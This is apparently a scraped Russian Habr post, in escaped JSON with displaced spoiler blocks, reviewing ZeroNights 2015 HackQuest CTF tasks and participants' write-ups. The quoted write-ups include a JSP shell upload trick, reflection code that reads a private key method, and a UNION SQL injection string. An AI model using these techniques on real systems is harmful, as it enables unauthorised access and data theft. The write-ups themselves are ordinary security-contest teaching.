![\"image\"\/](\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/6b7\/1d3\/db8\/6b71d3db8a086658cd9d64609f444de6.jpg\")
<\/p>\n <\/p>\n
\u0414\u043e \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 ZeroNights, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u044b \u0443\u0436\u0435 \u043d\u0435 \u0440\u0430\u0437 \u043f\u0438\u0441\u0430\u043b\u0438 \u043d\u0430 \u0425\u0430\u0431\u0440\u0435, \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0434\u043d\u0438!<\/p>\n
\u041e\u0434\u043d\u0438\u043c \u0438\u0437 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043d\u0430\u0448\u0438\u0445 \u043f\u043e\u0441\u0442\u043e\u0432 \u0431\u044b\u043b \u0440\u0430\u0441\u0441\u043a\u0430\u0437 \u043f\u0440\u043e HackQuest<\/a>. \u041e\u043d \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0440\u043e\u0448\u0435\u043b \u0438 \u043f\u0440\u0438\u0448\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u0445 \u0438 \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u0438\u0445 \u0440\u0435\u0448\u0430\u043b\u0438. \u0418 \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435 \u2014 \u043f\u043e\u0437\u0434\u0440\u0430\u0432\u0438\u0442\u044c \u043f\u043e\u0431\u0435\u0434\u0438\u0442\u0435\u043b\u0435\u0439!<\/p>\n <\/a> <\/p>\n \u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u043e \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u044b\u0435 \u0443\u0441\u043b\u043e\u0432\u0438\u044f \u2014 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 JSP \u043a\u043e\u0434\u0430 (\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0441 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f\u043c\u0438), \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0435 \u043e\u0431\u043e\u0448\u043b\u043e\u0441\u044c \u0431\u0435\u0437 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439. \u041f\u0440\u0438 \u0441\u0442\u0430\u0440\u0442\u0435 \u0442\u0430\u0441\u043a\u0430 \u0442\u043e\u043c\u043a\u0430\u0442 \u043d\u0435 \u043e\u0431\u043d\u0443\u043b\u0438\u043b \u043a\u044d\u0448 (\u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u043a\u043b\u0430\u0441\u0441\u043e\u0432 \u0438\u0437 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f) \u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u0431\u044b\u043b\u043e \u0447\u0435\u0440\u0435\u0437 RCE \ud83d\ude42 \u041c\u044b \u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u044d\u0442\u043e \u043a\u0430\u043a \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435, \u0442\u0430\u043a \u043a\u0430\u043a \u0438 \u043e\u043d\u043e \u0437\u0430\u043d\u044f\u043b\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0438 \u0441\u043e\u0437\u0434\u0430\u043b\u043e \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0435\u0436\u0434\u0443 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c\u0438<\/p>\n \u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0442 cdump <\/p>\n \u041f\u0440\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0438 \u0437\u0430\u043a\u0430\u0437\u0430 \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0444\u043e\u0440\u043c\u044b \u0432 Burp \u0438 \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u043e\u043b\u0435 orderName \u043d\u0430 anything.jsp, \u0430 \u0432 \u043f\u043e\u043b\u0435 order \u0432\u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0435\u043a\u0441\u0442 \u043b\u044e\u0431\u043e\u0433\u043e jsp-\u0448\u0435\u043b\u043b\u0430. <\/div>\n<\/div>\n \u041f\u043e\u0441\u043b\u0435 \u0442\u0430\u0441\u043a \u0431\u044b\u043b \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0443\u0449\u0435\u043d \u0438 \u0432\u043e\u0442 \u0443\u0436\u0435 \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435 (\u0432\u0440\u0430\u0439\u0442\u0430\u043f \u043e\u0442 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u043c\u0435\u0441\u0442\u0430 \u2014 Beched) <\/p>\n Input<\/i><\/p>\n Site with file upload functionality. Output<\/i><\/p>\n Open the classes in JD-GUI: screenshot<\/a>.<\/p>\n We can see the source code of JSP checker, which parses page imports. There’re a lot of ways to bypass this silly checker, but we’ll try to get flag without reading the file system. Initially the flag was in SecretGrandParentForBigBossesNeeds.class: <\/p>\n On the screenshot on the left you can see a long chain of inherited classes, this clearly tells us, that we should somehow use reflection. If we try to import SecretGrandParentForBigBossesNeeds, we fail, let’s try to import Secret. <\/p>\n Hm, error 500\u2026 In the stack trace we can read, that \u00abmethod TrueSecretChocolateKey of class SadBigBoss is not visible\u00bb. That’s it, flag is on the page =) <\/p><\/blockquote>\n <\/div>\n<\/div>\n \u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u0431\u044b\u043b\u043e \u043d\u0435\u0442\u0438\u043f\u0438\u0447\u043d\u044b\u043c \u0434\u043b\u044f \u043d\u0430\u0448\u0435\u0433\u043e \u0445\u0430\u043a-\u043a\u0432\u0435\u0441\u0442\u0430 \u2014 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u0440\u0443\u0442\u0438\u0442\u044c \u0445\u044d\u0448\u0438, \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043d\u044b\u0435, \u0438\u0441\u043a\u0430\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043d\u0435\u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u043e\u0432 \u0438 \u043e\u043f\u0442\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0445. \u0412\u0440\u0430\u0439\u0442\u0430\u043f\u0430 \u043f\u043e\u043a\u0430 \u0435\u0449\u0435 \u043d\u0435\u0442, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u2014 \u0442\u0430\u043a \u0441\u0440\u0430\u0437\u0443 \u0434\u043e\u0431\u0430\u0432\u043b\u044e \u0435\u0433\u043e \u0441\u044e\u0434\u0430.<\/p>\n \u042d\u0442\u043e \u0431\u044b\u043b \u0442\u0430\u0441\u043a-\u0441\u043f\u0440\u0438\u043d\u0442, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0438\u0437 \u0441\u0435\u0431\u044f \u00ab\u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0440\u044b\u043d\u043e\u043a\u00bb (\u043e\u0442\u0441\u044e\u0434\u0430 \u0438 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435). \u0412 \u043d\u0451\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 Java-\u0448\u0442\u0443\u043a\u0438: jsp \u0438 \u0441\u0435\u0440\u0432\u043b\u0435\u0442\u044b, Hibernate, API \u043d\u0430 Restlet. \u041e\u0447\u0435\u043d\u044c \u043a\u0440\u0430\u0442\u043a\u043e \u0438 \u043f\u043e \u0434\u0435\u043b\u0443 \u043e\u0442 AV1ct0r:<\/p>\n 1. \u041d\u0430\u0448\u0435\u043b admin.jsp, search.jsp, index.jsp, admin_login.jsp, adminochka.jsp, adminochka.jsp.bak 3. \u0418\u043d\u044a\u0435\u043a\u0446\u0438\u044f host: zn-java \u2026<\/p>\n 4. \u0421\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043b \u043a\u043b\u0438\u0435\u043d\u0442 \u0438 \u0437\u0430\u043f\u0438\u0441\u0430\u043b \u0435\u0433\u043e \u0442\u0440\u0430\u0444\u0438\u043a solve.php<\/b> <\/p>\n <\/div>\n<\/div>\n \u0411\u0430\u0433\u0438 \u043f\u0440\u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 OAuth (vk), CSRF, zip path traversal \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0432\u0435\u0449\u0438 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043d\u0430\u0439\u0442\u0438 \u0438 \u0441\u0443\u043c\u0435\u0442\u044c \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c (\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438\u0441\u044c \u043d\u0435\u043c\u043d\u043e\u0433\u0438\u0435).<\/p>\n \u0412\u0440\u0430\u0439\u0442\u0430\u043f \u043e\u0442 Beched <\/p>\n Input<\/i><\/p>\n Site (0x3d.ru) with OAuth (vk.com) functionality. Output<\/i><\/p>\n There were a lot of unintended bugs, including XSS, SQL injection, RCE, etc\u2026 Some of them are described here.<\/p>\n 1. Authentication bypass (unintended) 2. Authentication bypass 3. Race condition (unintended) 4. SQL injection (unintended) 5. Code execution (unintended) So, we can execute code in the filename. But no flag on this test server %)<\/p>\n 6. Code execution 7. open_basedir bypass (unintended) 8. Flag <\/div>\n<\/div>\n \u041a\u043b\u0430\u0441\u0441\u0438\u043a\u0430. \u041d\u0430\u0434\u043e \u0431\u044b\u043b\u043e \u043d\u0430\u0439\u0442\u0438 \u043a\u043b\u044e\u0447 \u043d\u0430 3 \u0440\u0430\u0437\u043d\u044b\u0445 \u044d\u0442\u0430\u043f\u0430\u0445. \u041f\u0435\u0440\u0432\u044b\u0435 \u0434\u0432\u0430 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0431\u044b\u043b\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435, \u0430 \u0432\u043e\u0442 \u0442\u0440\u0435\u0442\u0438\u0439 \u2014 \u043d\u0435\u0442.<\/p>\n \u0412\u0440\u0430\u0439\u0442\u0430\u043f \u043e\u0442 sysenter \u2014 hackquest.zeronights.org\/downloads\/2015-day5-writeup_sysenter.pdf<\/a><\/p>\n \u0417\u0430\u0434\u0430\u0447\u0435\u0439 \u0431\u044b\u043b\u043e \u043f\u043e\u043b\u043e\u043c\u0430\u0442\u044c SIP \u0447\u0435\u0440\u0435\u0437\u2026 SQL \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e. \u041f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043a\u0430\u043a \u0431\u044b \u043d\u0430\u043c\u0435\u043a\u0430\u0435\u0442, \u0447\u0442\u043e \u043d\u0430\u0434\u043e \u043b\u043e\u043c\u0430\u0442\u044c \u043a\u0430\u043a\u043e\u0439-\u0442\u043e SIP \u0441\u0435\u0440\u0432\u0438\u0441 \u0431\u0430\u043d\u043a\u0430. \u0414\u0430 \u0438 \u0432 \u0441\u0430\u043c\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f phreaking \u2014 en.wikipedia.org\/wiki\/Phreaking<\/a> \u0414\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0443 \u043d\u0430\u0448\u0435\u0433\u043e \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u0431\u0430\u043d\u043a\u0430 \u0435\u0441\u0442\u044c SIP \u0441\u0435\u0440\u0432\u0438\u0441, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u043a \u0438 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e SIP\u043e\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043d\u0430 \u043f\u043e\u0440\u0442\u0435 5060. \u041e\u0434\u043d\u0430\u043a\u043e, \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043d\u044f\u0442\u044c \u043d\u0430 \u043a\u0430\u043a\u043e\u0439 extension \u0437\u0432\u043e\u043d\u0438\u0442\u044c. \u0423 Asterisk \u0435\u0441\u0442\u044c extension s, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0435\u0441\u043b\u0438 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u043d\u043e\u043c\u0435\u0440 www.voip-info.org\/wiki\/view\/Asterisk+s+extension<\/a> \u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u0431\u044b\u043b\u043e \u044d\u043f\u0438\u0447\u043d\u044b\u043c, \u0437\u0430\u0434\u0430\u0447\u0435\u0439 \u0431\u044b\u043b\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u0435\u0441\u0438\u0442\u044c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u043f\u043e\u0434 AVR, \u043d\u0430\u0439\u0442\u0438 \u0442\u0430\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (\u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435), \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c (\u0431\u044b\u043b \u043c\u043e\u0441\u0442 \u0441 \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e TCP \u043f\u043e\u0440\u0442\u0430 \u0432 uart). \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0430\u0434\u043e \u0431\u044b\u043b\u043e \u0441\u0442\u0430\u0449\u0438\u0442\u044c \u0441\u0435\u043a\u0440\u0435\u0442\u043d\u044b\u0439 \u0444\u043b\u0430\u0433 (\u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u043c\u0435\u043d\u044f\u043b\u0441\u044f), \u043f\u043e\u0442\u043e\u043c \u0434\u0432\u0430 \u0440\u0430\u0437\u0430 \u043c\u043e\u0440\u0433\u043d\u0443\u0442\u044c \u0441\u0432\u0435\u0442\u043e\u0434\u0438\u043e\u0434\u043e\u043c (\u0440\u0435\u0430\u043a\u0446\u0438\u044e \u043d\u0430 \u0441\u0432\u043e\u0439 \u043f\u044d\u0439\u043b\u043e\u0430\u0434 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 \u0432 \u043f\u0440\u044f\u043c\u043e\u043c \u044d\u0444\u0438\u0440\u0435), \u043f\u043e\u0441\u043b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u0430 (\u043d\u0430 openCV) \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u043b\u0430 \u0444\u043b\u0430\u0433\u043e\u043f\u0440\u0438\u0435\u043c\u043d\u0438\u043a \u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0444\u043b\u0430\u0433 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b\u0441\u044f \u0438 \u0437\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u043e\u0431\u0435\u0434\u0430. \u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u043f\u0440\u043e\u0434\u043b\u0435\u0432\u0430\u043b\u043e\u0441\u044c \u0438 \u0432\u043c\u0435\u0441\u0442\u043e \u043e\u0434\u043d\u0438\u0445 \u0441\u0443\u0442\u043e\u043a \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b\u043e \u0447\u0435\u0442\u044b\u0440\u0435. \u0410 \u0442\u0430\u043a \u044d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b\u043e \u0434\u043b\u044f \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 (\u0442\u0440\u0430\u043d\u0441\u043b\u044f\u0446\u0438\u044f \u0431\u044b\u043b\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 ffmpeg + nginx-rtmp, \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f \u0437\u0430\u0434\u0435\u0440\u0436\u043a\u0438 \u0432 2-3 \u0441\u0435\u043a\u0443\u043d\u0434\u044b) \u0412\u0440\u0430\u0439\u0442\u0430\u043f\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442, \u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0437\u0431\u043e\u0440 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0432\u043e\u0440\u043a\u0448\u043e\u043f\u0430 \u043f\u043e AVR \u043d\u0430 \u0441\u0430\u043c\u043e\u043c ZeroNights (\u043f\u043e\u0441\u0442\u0430\u0440\u0430\u0435\u043c\u0441\u044f \u043e\u0431 \u044d\u0442\u043e\u043c \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435, \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435\u0439).<\/p>\n \u0415\u0449\u0435 \u0440\u0430\u0437 \u0445\u043e\u0447\u0443 \u0441\u043a\u0430\u0437\u0430\u0442\u044c \u0441\u043f\u0430\u0441\u0438\u0431\u043e \u0432\u0441\u0435\u043c \u0430\u0432\u0442\u043e\u0440\u0430\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0439, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e: @aplastunov<\/a>, @w34kp455<\/a>, @antyurin<\/a>, @igc_iv<\/a>, @nkelesis<\/a>, @Lukesparamore<\/a>, __ek0<\/a>, @090h<\/a>, @nezlooy<\/b><\/a>, @cherboff<\/a>, dark_k3y<\/a> \u0438 Litvinov Egor.<\/p>\n \u041d\u0430 \u044d\u0442\u043e\u043c \u043f\u0440\u043e HackQuest \u2014 \u0432\u0441\u0435 \u0438 \u043f\u0440\u043e\u0448\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043f\u0440\u043e\u2026<\/p>\n \u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 HardWare Village \u043d\u0430 \u043e\u0431\u0430 \u0434\u043d\u044f:<\/p>\n \u0414\u0435\u043d\u044c 1: <\/b> <\/p>\n \u0414\u0435\u043d\u044c 2:<\/b> <\/p>\n \u0421\u043e \u0432\u0441\u0435\u043c\u0438 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u044f\u043c\u0438 \u0438 \u043c\u0435\u0442\u043e\u0434\u0430\u043c \u0430\u0442\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u0440\u0438\u043c\u0435\u0440\u0430\u0445.<\/p>\n \u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u0447\u0442\u043e \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u0432\u0442\u0440\u0430 \u0432 14:00 \u2014 2015.zeronights.ru\/registraciya.html<\/a>, \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0433\u043e\u0442\u043e\u0432\u0430, \u0438\u0434\u0435\u0442 \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0430. \u0423\u0432\u0438\u0434\u0438\u043c\u0441\u044f \u043d\u0430 ZeroNights 2015! <\/p>\n \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 http:\/\/habrahabr.ru\/post\/271431\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":" \u0414\u043e \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 ZeroNights, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u044b \u0443\u0436\u0435 \u043d\u0435 \u0440\u0430\u0437 \u043f\u0438\u0441\u0430\u043b\u0438 \u043d\u0430 \u0425\u0430\u0431\u0440\u0435, \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0434\u043d\u0438!<\/p>\n\n
\u0414\u0435\u043d\u044c 1 \u2014 Chocolate Factory<\/h2>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n\n
\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c \u0448\u0435\u043b\u043b (\u0441\u0441\u044b\u043b\u043a\u0430 \u00abYou can check your order here\u00bb) \u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c tomcat’\u043e\u0432\u0441\u043a\u0443\u044e \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e webapps, \u0432 \u043d\u0435\u0439 \u043d\u0430\u0445\u043e\u0434\u0438\u043c jsp \u0444\u0430\u0439\u043b\u044b \u0438 \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043a\u043b\u0430\u0441\u0441\u044b, \u0434\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b jad \u043e\u0434\u0438\u043d \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 (WEB-INF\/classes\/ZN_Chocolate\/CRYPTO\/SecretGrandParentForBigBossesNeeds.class) \u0432\u0438\u0434\u0438\u043c \u043d\u0443\u0436\u043d\u044b\u0439 \u043d\u0430\u043c \u043a\u043b\u044e\u0447: private String TrueSecretChocolateKey() { return \u00abZNV:iMp0518UrU_53cR3T_k3y_50d11dcb46506e93917f82c0e828b1a9\u00bb; }<\/p><\/blockquote>\n\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n\n
At first it was easily solved by uploading JSP-shell in XML format, bypassing white-list. After that all participants were given the source code.
Task again could solved in a \u00abcheating\u00bb way, by reading the source code, but I solved it in an intended way.<\/p>\npublic class SecretGrandParentForBigBossesNeeds { private String TrueSecretChocolateKey() { return "ZNV:3X@mPl3_k3y_a0a81ab87f74d307b8e51fd85048e714"; } <\/code><\/pre>\n<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% Secret s = new Secret(); out.println(s.TrueSecretChocolateKey()); %> <\/code><\/pre>\n
Aha! They changed name of the class after fixing the source code. But anyway, method is not visible, it’s private. Let’s use reflection to make it accessible:<\/p>\n<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% SadBigBoss s = new SadBigBoss(); Method method = s.getClass().getDeclaredMethod("TrueSecretChocolateKey"); method.setAccessible(true); out.println(method.invoke(s)); %> <\/code><\/pre>\n\u0414\u0435\u043d\u044c 2 \u2014 HSM V1.0<\/h2>\n
\u0414\u0435\u043d\u044c 3 \u2014 BAZAAR NG<\/h2>\n
\u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043b\u043e \u0438\u0437 \u0442\u0440\u0451\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e: execution after redirect, HQL injection (\u0430\u043d\u0430\u043b\u043e\u0433 SQL \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438, \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f Hibernate) \u0438 RCE \u0447\u0435\u0440\u0435\u0437 XML \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0432 Restlet.
\u041d\u043e \u0442\u0430\u043a \u0436\u0435 \u0431\u044b\u043b\u043e \u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043c\u0435\u043b\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0431\u0440\u0443\u0442\u0430 \u0443\u0447\u0451\u0442\u043e\u043a, XSS’\u043a\u0438, \u0438 \u0442.\u0434.), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0438 \u00ab\u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c\u00bb \u0434\u0440\u0443\u0433\u0438\u0445 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 (\u0438\u043b\u0438 \u0434\u0430\u0436\u0435 \u0430\u0434\u043c\u0438\u043d\u0430) \u0438 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u043a\u0430\u043a\u0438\u0435-\u0442\u043e \u0447\u0430\u0441\u0442\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u044f.<\/p>\n\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n\n
2. \u0421\u0431\u0440\u0443\u0442\u0438\u043b test \/ test (\u0432\u0438\u0434\u043d\u043e \u043a\u0442\u043e-\u0442\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u043b)<\/p>\n
potato’ AND ‘1\\»=1 union select 1,(select user()),3 \u2014 ‘=’1%<\/p>\n
version: 5.5.46-0ubuntu0.14.04.2
